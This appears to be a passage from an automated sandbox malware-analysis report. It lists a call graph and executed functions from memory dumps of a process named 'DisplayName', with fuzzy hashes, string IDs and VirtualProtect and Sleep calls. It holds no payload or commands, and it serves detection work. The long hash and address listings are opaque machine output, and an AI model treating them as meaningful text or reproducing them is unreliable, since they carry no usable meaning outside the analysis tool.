49054 57f05e8 49055 57f008f 49054->49055 49058 57ed37a 49055->49058 49062 57ed388 49055->49062 49059 57ed388 49058->49059 49066 57ed4f2 49059->49066 49063 57ed39d 49062->49063 49065 57ed4f2 2 API calls 49063->49065 49064 57ed3b3 49064->49055 49065->49064 49068 57ed513 49066->49068 49067 57ed6c7 49068->49067 49071 57ee1b8 49068->49071 49075 57ee1b0 49068->49075 49072 57ee201 VirtualProtect 49071->49072 49074 57ee26e 49072->49074 49074->49068 49076 57ee201 VirtualProtect 49075->49076 49078 57ee26e 49076->49078 49078->49068 49079 57f00e5 49080 57f008f 49079->49080 49081 57ed37a 2 API calls 49080->49081 49082 57ed388 2 API calls 49080->49082 49081->49080 49082->49080 49113 8bd030 49114 8bd048 49113->49114 49115 8bd0a3 49114->49115 49118 5620fb0 49114->49118 49123 5620fa4 49114->49123 49119 5621009 49118->49119 49128 5621510 49119->49128 49133 56214ff 49119->49133 49120 562103e 49120->49120 49124 5620fb0 49123->49124 49126 5621510 2 API calls 49124->49126 49127 56214ff 2 API calls 49124->49127 49125 562103e 49125->49125 49126->49125 49127->49125 49129 562153d 49128->49129 49130 5620448 2 API calls 49129->49130 49132 56216d3 49129->49132 49131 56216c4 49130->49131 49131->49120 49132->49120 49134 5621510 49133->49134 49135 5620448 2 API calls 49134->49135 49137 56216d3 49134->49137 49136 56216c4 49135->49136 49136->49120 49137->49120

                                      Executed Functions

                                      Function 057F5D10 Relevance: 2.4, Strings: 1, Instructions: 1137COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4
                                      • API String ID: 0-4088798008
                                      • Opcode ID: 519800f64d83d5068336409a5b01ddec15d76ea391cecd76140acf830a57262a
                                      • Instruction ID: 69f9209bf0d8d64e931a049dbdfb0567545304407995f96db6f1e75a251a4361
                                      • Opcode Fuzzy Hash: 519800f64d83d5068336409a5b01ddec15d76ea391cecd76140acf830a57262a
                                      • Instruction Fuzzy Hash: C3B2D734A00218DFDB14DFA8C994BADB7B6BF88301F158199E606AB3A5DB70ED41DF50
                                      Function 057F6047 Relevance: 1.7, Strings: 1, Instructions: 495COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4
                                      • API String ID: 0-4088798008
                                      • Opcode ID: af68b790e80f34696bd49836c6991be7413f22ce94e1d031dd8379024ed0664f
                                      • Instruction ID: e30a676e93576eeafa9179e2f9492aff5e1acfd79c47f7ed699f71ebc50274fd
                                      • Opcode Fuzzy Hash: af68b790e80f34696bd49836c6991be7413f22ce94e1d031dd8379024ed0664f
                                      • Instruction Fuzzy Hash: 9622E834A00218DFDB14DFA4C994BADB7B2FF48300F1581A9E609AB3A5DB71AD81DF50
                                      Function 057F2908 Relevance: 1.5, Strings: 1, Instructions: 251COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: a451a56508c8c056a20abb3fb123f55a96b3796582b9961d94b3272d048a96db
                                      • Instruction ID: 931ad55903ef111d762d51220d0577b1edffc273ba093906467ebf78c15f78dd
                                      • Opcode Fuzzy Hash: a451a56508c8c056a20abb3fb123f55a96b3796582b9961d94b3272d048a96db
                                      • Instruction Fuzzy Hash: 66B1F378E00218CFEB14DFA9C885B9DBBF2BB89304F5081AAD509BB356DB705985DF04
                                      Function 05717B70 Relevance: .2, Instructions: 235COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790402152.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5710000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d536f31ddef2eac283648f2a7049ae28d39c1223fa4d6c5f41a485aa811fd372
                                      • Instruction ID: 34bd543b9e4e7b4ee6bac42a8b0845d65955b93373cb1d500915a4a879e75c8f
                                      • Opcode Fuzzy Hash: d536f31ddef2eac283648f2a7049ae28d39c1223fa4d6c5f41a485aa811fd372
                                      • Instruction Fuzzy Hash: C9A1E370E05218CFDB28CFA9D984BADBBF6FB49304F208169D809AB355DB709945DF08
                                      Function 05717B60 Relevance: .2, Instructions: 229COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790402152.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5710000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1166c24f893b94fedaa626a984993ed2ba8bca6ae35039c06ce3ef90b4ee8f7c
                                      • Instruction ID: a41c3684d0add67b6706cc53fd0fe4057f12428ec3364e21e38bb3c66de353fe
                                      • Opcode Fuzzy Hash: 1166c24f893b94fedaa626a984993ed2ba8bca6ae35039c06ce3ef90b4ee8f7c
                                      • Instruction Fuzzy Hash: 5EA1D374E05218CFDB28CFA9D984BADBBF6FB49304F208169E809AB355DB709945DF04
                                      Function 05B1E4B0 Relevance: .1, Instructions: 83COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2791083524.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5b00000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f9ba6157e2aa59047816f068b7a1e389bb177d0cb5427280df254ae1ea439148
                                      • Instruction ID: 58c3e7e7721374664409c8fe59ba7c52e3e428197fb3bf03ebe2d87667e77252
                                      • Opcode Fuzzy Hash: f9ba6157e2aa59047816f068b7a1e389bb177d0cb5427280df254ae1ea439148
                                      • Instruction Fuzzy Hash: BC310A34900218CFDB54DF29D858BADBBF6FB49300F5081EAE90AA7390DB359944CF05
                                      Function 057198EA Relevance: 2.5, Strings: 2, Instructions: 45COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 446 57198ea-5719900 448 5719908-57199b2 446->448 455 57199b8-57199c3 448->455 456 571812d-5718138 448->456 455->456 457 5718141-5719a4e 456->457 458 571813a-571856a 456->458 460 5719a50 457->460 461 5719a55-5719a69 457->461 463 5718571-57185a3 458->463 464 571856c 458->464 460->461 461->456 463->456 466 57185a9-57185b4 463->466 464->463 466->456
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790402152.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5710000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: G$O
                                      • API String ID: 0-2636120048
                                      • Opcode ID: e3191d306d395ac501db1690892cee7f5717d213d18ea2b6547abbd10b947937
                                      • Instruction ID: b45846aee04f8a8d5a2e5093397e2444924c316a9f2bcd9637025add5e30979c
                                      • Opcode Fuzzy Hash: e3191d306d395ac501db1690892cee7f5717d213d18ea2b6547abbd10b947937
                                      • Instruction Fuzzy Hash: FE21B2B494122ACFDB64DF28C944BADBBF2FB48301F4041E9E50EA7650EB359E859F05
                                      Function 05711AEF Relevance: 2.5, Strings: 2, Instructions: 30COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 467 5711aef-5711b27 call 5b15af8 469 5711b2c-5711b6e 467->469 472 5711b74-5711b7c 469->472 473 571011f-5710127 469->473 472->473 474 5710130-5712a4b 473->474 475 5710129-5710547 473->475 474->473 481 5712a51-5712a59 474->481 475->473 483 571054d-5710553 475->483 481->473 483->473
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790402152.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5710000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: R$t
                                      • API String ID: 0-922318671
                                      • Opcode ID: 6597bec1fa34d346fac7e812de28f2229ad4b295b9167b749f5209b09146a551
                                      • Instruction ID: aed1eabc0d541990817206ef318491228a49452bbce10257a8f419ca80f4d0e2
                                      • Opcode Fuzzy Hash: 6597bec1fa34d346fac7e812de28f2229ad4b295b9167b749f5209b09146a551
                                      • Instruction Fuzzy Hash: EC01AE74A11228DFDB65EF24D884BEDB7B1BB49310F0041EAE90CA7264CB346E80DF49
                                      Function 05B014ED Relevance: 2.5, Strings: 2, Instructions: 22COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 485 5b014ed-5b0150d call 5b1ff98 487 5b01513-5b0153b 485->487 489 5b00110-5b0011b 487->489 490 5b01541-5b0154c 487->490 491 5b00124-5b149af 489->491 492 5b0011d-5b00671 489->492 490->489 492->489 501 5b00677-5b00682 492->501 501->489
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2791083524.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5b00000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv$W
                                      • API String ID: 0-761027979
                                      • Opcode ID: 5c7e8fae31b43635eeac9a1051b63cc2845403bcf4756ea2097ebdf7775335c2
                                      • Instruction ID: e37e7f7ff77873f20b8871c3e3ff3c861820b4ca93efd9e0ddb9b0037af39ceb
                                      • Opcode Fuzzy Hash: 5c7e8fae31b43635eeac9a1051b63cc2845403bcf4756ea2097ebdf7775335c2
                                      • Instruction Fuzzy Hash: 58F03A74A00118CFDBA09B18C848BA97AB5EB4A304F5014E5A049A3680CB745EC48F06
                                      Function 057185E3 Relevance: 2.5, Strings: 2, Instructions: 17COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 503 57185e3-57185f1 504 5718601-571861a 503->504 505 5718620-571862b 504->505 506 571812d-5718138 504->506 505->506 507 5718141-5719a4e 506->507 508 571813a-571856a 506->508 510 5719a50 507->510 511 5719a55-5719a69 507->511 513 5718571-57185a3 508->513 514 571856c 508->514 510->511 511->506 513->506 516 57185a9-57185b4 513->516 514->513 516->506
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790402152.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5710000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $1
                                      • API String ID: 0-1731886702
                                      • Opcode ID: 98d190da455a9913d1448de4c0eeafff1275bb4f59689acf3b57be1bc00dc7bb
                                      • Instruction ID: 1128bdd2e0068aa4d23f32434993f0a2b9118788e99af704c981c871f021f648
                                      • Opcode Fuzzy Hash: 98d190da455a9913d1448de4c0eeafff1275bb4f59689acf3b57be1bc00dc7bb
                                      • Instruction Fuzzy Hash: 3FF052B4D1926CCFDB60CF28D848799BBB2BB08354F4152E9E80DA3241D7759A85EF06
                                      Function 057EE1B0 Relevance: 1.6, APIs: 1, Instructions: 99memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1294 57ee1b0-57ee26c VirtualProtect 1297 57ee26e-57ee274 1294->1297 1298 57ee275-57ee2c5 1294->1298 1297->1298
                                      APIs
                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 057EE25C
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790514543.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57e0000_DisplayName.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: b186d6f9d15eed369ef7b736016be4469dbca456a16f83a5c3ec27f1c212dc9d
                                      • Instruction ID: 573fc03dc11a912f45c73dd5e4f40b3d6aa81d778a6402af4e47328951bf3562
                                      • Opcode Fuzzy Hash: b186d6f9d15eed369ef7b736016be4469dbca456a16f83a5c3ec27f1c212dc9d
                                      • Instruction Fuzzy Hash: 5B31B8B9D01258DFCB10CFE9D984AEEFBB5AF48310F14942AE814B7250D739A945CF64
                                      Function 05620921 Relevance: 1.6, APIs: 1, Instructions: 99memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1284 5620921-56209dc VirtualProtect 1288 56209e5-5620a2d 1284->1288 1289 56209de-56209e4 1284->1289 1289->1288
                                      APIs
                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 056209CC
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2789679085.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5620000_DisplayName.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: 455e8d66dbd45ab8e7ef2c2e1d291046b35d624d203ca242c60f8f699c8fb8c4
                                      • Instruction ID: 240a613c1b555eadfa1c3e3f221edfc43b4b845c6f0804a0d9e10d5791091619
                                      • Opcode Fuzzy Hash: 455e8d66dbd45ab8e7ef2c2e1d291046b35d624d203ca242c60f8f699c8fb8c4
                                      • Instruction Fuzzy Hash: 1B3195B8D012589FDB14CFA9D884ADEFBB1BF49310F14A42AE815B7210D739A945CF64
                                      Function 057EE1B8 Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 057EE25C
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790514543.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57e0000_DisplayName.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: b2e22326acd59f1b27b94faed6e937fecd4a5532a863674effd32a1d06373468
                                      • Instruction ID: 39f4d3bed6f4c88a223502c15c34575d098de45476c5c3276231353f80cda3f3
                                      • Opcode Fuzzy Hash: b2e22326acd59f1b27b94faed6e937fecd4a5532a863674effd32a1d06373468
                                      • Instruction Fuzzy Hash: D331A7B4D012589FCF10CFEAD984AEEFBB5AF49310F14942AE814B7210D739A945CFA4
                                      Function 05620928 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 056209CC
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2789679085.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5620000_DisplayName.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: 40fef64e9f4ae1dd667d38aa89dafbe14d850e24e53db273bb9a2a612fd88070
                                      • Instruction ID: 0ddfa36cbbcf1e04f8c1a4355e4f53b1b17360fc428fb683e63cd55e68c0db4d
                                      • Opcode Fuzzy Hash: 40fef64e9f4ae1dd667d38aa89dafbe14d850e24e53db273bb9a2a612fd88070
                                      • Instruction Fuzzy Hash: 6B3195B8D012589FDB10CFAAD984ADEFBB1BF49310F20A42AE815B7210D735A945CF64
                                      Function 057ED0B0 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790514543.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57e0000_DisplayName.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 8187a229b63837bdc962c0779c9487e338a90878d5d164ebaae1c4bb513f3c47
                                      • Instruction ID: 0ddd778a6a104071fe6ce238eebc14c9a66a6786a43b98f82c0496fdcdb18991
                                      • Opcode Fuzzy Hash: 8187a229b63837bdc962c0779c9487e338a90878d5d164ebaae1c4bb513f3c47
                                      • Instruction Fuzzy Hash: E131A9B4D012589FDB10CFAAD984AEEFBF5AF49310F14942AE814B7240D739A945CFA4
                                      Function 057ED0AA Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790514543.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57e0000_DisplayName.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 43484c00bdaa6432f90e2a4d9766e4b835670ffc5e829f9985a35ce49c48f3aa
                                      • Instruction ID: 13838cb7e67ab4a9060c084d94ef96655dafe11668eabcd0d9e100fd69b4415a
                                      • Opcode Fuzzy Hash: 43484c00bdaa6432f90e2a4d9766e4b835670ffc5e829f9985a35ce49c48f3aa
                                      • Instruction Fuzzy Hash: 0D31C9B5D012189FCB10CFA9D980AEEFBF1AF49310F14942AE814B7340D739A945CF64
                                      Function 058319F3 Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790871087.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5830000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: 8c9bd459b430e912322b7d035aeedd3a93d669692721a087231ec61c6b47353d
                                      • Instruction ID: c6da95e52822ff6943eb1e87e8230880bbdfac45d6911dec2f6072c859ae1022
                                      • Opcode Fuzzy Hash: 8c9bd459b430e912322b7d035aeedd3a93d669692721a087231ec61c6b47353d
                                      • Instruction Fuzzy Hash: 1EA11670A05218CFDB54DF68D889BADBBB2FB89314F1081AAD909EB344DB345E85CF51
                                      Function 057131AC Relevance: 1.5, Strings: 1, Instructions: 208COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790402152.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5710000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: bdfd8edc1ed393bb25bc4a0de5227108f105e9b7f910e2de392ddff6fb230112
                                      • Instruction ID: 0eb216170343cd7cf4891da685fbfa386257db1470a4658f8a3c7ee8f57c6b61
                                      • Opcode Fuzzy Hash: bdfd8edc1ed393bb25bc4a0de5227108f105e9b7f910e2de392ddff6fb230112
                                      • Instruction Fuzzy Hash: F0913C70A09208DFDB44DFACD454AEDBBB6FF4A311F10452AE806BB344DB349A45EB19
                                      Function 0583873C Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790871087.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5830000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: 328cdde764b967ea3e0e175edbcb20c08ae07324aa470f959715e2a6b2aa3295
                                      • Instruction ID: 9630ea6b9ba34e8fbf1241cd18415ffe59c2b9801bd33ac9e7bc6bc8c86e1369
                                      • Opcode Fuzzy Hash: 328cdde764b967ea3e0e175edbcb20c08ae07324aa470f959715e2a6b2aa3295
                                      • Instruction Fuzzy Hash: FA81B074A06218CFDB54DF68D889BADBBF6BB89304F1081A9E909EB354DB305D85CF41
                                      Function 05837C88 Relevance: 1.4, Strings: 1, Instructions: 181COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790871087.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5830000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: 48d41e5cb937206d172f01b188bc92f91d164706e1837e40c357bc75ecd06b56
                                      • Instruction ID: 5dddfe3abaf868ae2a9c773768507dec16f7bcaf33cd93079a4a39f1ca2a1760
                                      • Opcode Fuzzy Hash: 48d41e5cb937206d172f01b188bc92f91d164706e1837e40c357bc75ecd06b56
                                      • Instruction Fuzzy Hash: E04114B0D052488FDB08DFA9D4857ACBBF2FB8A304F14806AE815EB258DB749985CF44
                                      Function 0583879A Relevance: 1.4, Strings: 1, Instructions: 175COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790871087.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5830000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: ab0d7a032d1e378cdfdd075c7e7c21edbebfdc25581c13e9ce96d536e8062e25
                                      • Instruction ID: b1a20742cbc3b97e529dc6dbab44654461cd2763543ce3936ca9db67164c41e5
                                      • Opcode Fuzzy Hash: ab0d7a032d1e378cdfdd075c7e7c21edbebfdc25581c13e9ce96d536e8062e25
                                      • Instruction Fuzzy Hash: F681D270A06218CFDB54DF69D889BADBBF2BB49314F1081AAE909EB354DB305D85CF41
                                      Function 05B1BC08 Relevance: 1.4, Strings: 1, Instructions: 173COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2791083524.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5b00000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: 010479308c3d4c9681a88de663ca8051f5030bea7dadfac838fb93e90ac764b8
                                      • Instruction ID: 3301e364a1ba3e560416bb25784f93915d4f62d5c1fb4c892d84599d3882f968
                                      • Opcode Fuzzy Hash: 010479308c3d4c9681a88de663ca8051f5030bea7dadfac838fb93e90ac764b8
                                      • Instruction Fuzzy Hash: 39713534E04208CFDB88DFA8D499AEDBBB6FF49300F50416AE815AB354CB346985CF59
                                      Function 058386D0 Relevance: 1.4, Strings: 1, Instructions: 168COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790871087.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5830000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: ab8ea236af68dc24d48ceabe9ad39c343bfc8469baa22f958116aa55bc88c7a5
                                      • Instruction ID: 268d617659dc31fc71ed870ae5ed99de8c0bd57718f0a461b004450b89a501c9
                                      • Opcode Fuzzy Hash: ab8ea236af68dc24d48ceabe9ad39c343bfc8469baa22f958116aa55bc88c7a5
                                      • Instruction Fuzzy Hash: 4071F370A06218CFDB54DF69D849BADBBF6FB89300F1081AAE909AB354DB305D85CF51
                                      Function 058386C0 Relevance: 1.4, Strings: 1, Instructions: 167COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790871087.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5830000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: 9d5eeeeafa88efe7ebfa204158dc57e4831c754f583527edede0624096fb3fcd
                                      • Instruction ID: 87f373439bc430c2be87f6c19403ab9af11cbe71f9f840fff8e5bb56f8bcf4a7
                                      • Opcode Fuzzy Hash: 9d5eeeeafa88efe7ebfa204158dc57e4831c754f583527edede0624096fb3fcd
                                      • Instruction Fuzzy Hash: 5571F274A06218CFDB54DF69D889B9DBBF2FB89300F1081AAE909AB354DB305D85CF51
                                      Function 05838B45 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790871087.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5830000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: c808798ee0256272b28f33ca5128dc6aeaf4f31304e7d073d8a675124cfc114d
                                      • Instruction ID: 2a1552932aa52a2fc01cfe8fd32c1626275ea94cef143b25b2762a109b61872c
                                      • Opcode Fuzzy Hash: c808798ee0256272b28f33ca5128dc6aeaf4f31304e7d073d8a675124cfc114d
                                      • Instruction Fuzzy Hash: 5F71D370A06218CFDB54DF68D899B9DBBF2FB49310F1081AAA909AB354DB305D85CF45
                                      Function 058367E1 Relevance: 1.4, Strings: 1, Instructions: 151COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790871087.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5830000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: dea8826c0aac8e43746c8fbaea426a5f98b3b09a5fd51684c733019d5ce725ad
                                      • Instruction ID: de7986ace903666146b91655acf64f9524be351bcc33e242d8d7ec86973478d9
                                      • Opcode Fuzzy Hash: dea8826c0aac8e43746c8fbaea426a5f98b3b09a5fd51684c733019d5ce725ad
                                      • Instruction Fuzzy Hash: 5971C370A00218CFDB64DF69D885BADBBB2FB59314F2081AAD909E7748DB705E85CF41
                                      Function 05837D40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790871087.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5830000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: 5bff121a4d98c5dcd8ac843af0fd730a8c21517e29e32940ec98aec3f9a45d75
                                      • Instruction ID: fa405cc7353f6ba328649fff25ddf3dcc462e8d61f7168ef90eb0b07caec6b7f
                                      • Opcode Fuzzy Hash: 5bff121a4d98c5dcd8ac843af0fd730a8c21517e29e32940ec98aec3f9a45d75
                                      • Instruction Fuzzy Hash: 0F41F8B0D05248CFDB18DF9AD4857ADBBF6FB8A304F108029E815EB258DB749945CF44
                                      Function 05838833 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790871087.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5830000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: 96c05bf23931d1dedfe42bae814f15b1c4e07265224cb0ae97837052933707e2
                                      • Instruction ID: 68b9b0a78539b13e8e3c22dd646af6944a59d1fab8ba5aa39550b3816c294647
